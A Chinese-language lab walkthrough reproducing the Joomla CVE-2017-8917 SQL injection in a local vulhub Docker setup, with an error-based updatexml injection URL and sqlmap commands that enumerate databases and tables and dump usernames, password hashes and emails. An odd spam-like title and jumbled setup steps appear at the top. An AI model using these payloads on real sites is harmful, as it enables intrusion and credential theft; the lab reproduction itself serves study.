技術(shù)專業(yè)網(wǎng)站建設(shè)免費(fèi)的關(guān)鍵詞挖掘工具
文章目錄
- 搭建環(huán)境
- 啟動(dòng)環(huán)境
- 漏洞復(fù)現(xiàn)
- 報(bào)錯(cuò)注入
- 使用sqlmap
前提條件:
1.安裝docker
docker pull medicean/vulapps:j_joomla_2
2.安裝docker-compose
docker run -d -p 8000:80 medicean/vulapps:j_joomla_2
3.下載vulhub
Docker Compose是 docker 提供的一個(gè)命令行工具,用來定義和運(yùn)行由多個(gè)容器組成的應(yīng)用,而docker-compose.yml是它的配置文件。
搭建環(huán)境
進(jìn)入vulhb目錄下的joomla,復(fù)現(xiàn)CVE-2017-8917漏洞:
cd /home/kali/vulhub/joomla/CVE-2017-8917
查看docker-compose的配置文件:
cat docker-compose.yml
如圖,里面有兩個(gè)鏡像文件的信息,還有容器名字:
然后使用下面命令,搭建docker-compose并啟動(dòng):
docker-compose up -d && docker-compose up -d
如圖:
啟動(dòng)環(huán)境
環(huán)境搭建成功后,在瀏覽器中輸入本機(jī)地址加之前配置文件中的端口10.9.75.45:8080進(jìn)入Joomla環(huán)境:
配置網(wǎng)站,輸入用戶名和密碼,密碼設(shè)為root,點(diǎn)擊下一步:
配置數(shù)據(jù)庫賬戶密碼,輸入之前在配置文件中看到的數(shù)據(jù)庫信息,點(diǎn)擊下一步:
用戶:root
密碼:vulhub
數(shù)據(jù)庫名:joomla
成功后點(diǎn)擊安裝,安裝成功后點(diǎn)擊刪除installation目錄(重要):
漏洞復(fù)現(xiàn)
報(bào)錯(cuò)注入
環(huán)境啟動(dòng)成功后刷新,頁面跳轉(zhuǎn)并出現(xiàn)報(bào)錯(cuò)信息,這時(shí)候可以用SQL注入中的報(bào)錯(cuò)注入來獲取數(shù)據(jù)庫信息,在URL中輸入:
?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
成功回顯當(dāng)前用戶名:
使用sqlmap
在kali中輸入下面命令,獲取數(shù)據(jù)庫名,注入點(diǎn)為list:
sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" --dbs
在彈出的交互式語句中直接回車,最后爆破出數(shù)據(jù)庫名:
,輸入下面命令,查看Joomla數(shù)據(jù)庫中的表:
sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables
第一個(gè)交互選n,第二個(gè)直接回車,列出57個(gè)表名,其中比較重要的表示users:
查看users表中的內(nèi)容:
–dump列表中指定列的內(nèi)容
sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" -D joomla -T '#__users' -C username,password,email --dump
成功獲得了用戶名、加密的密碼和之前輸入的郵箱: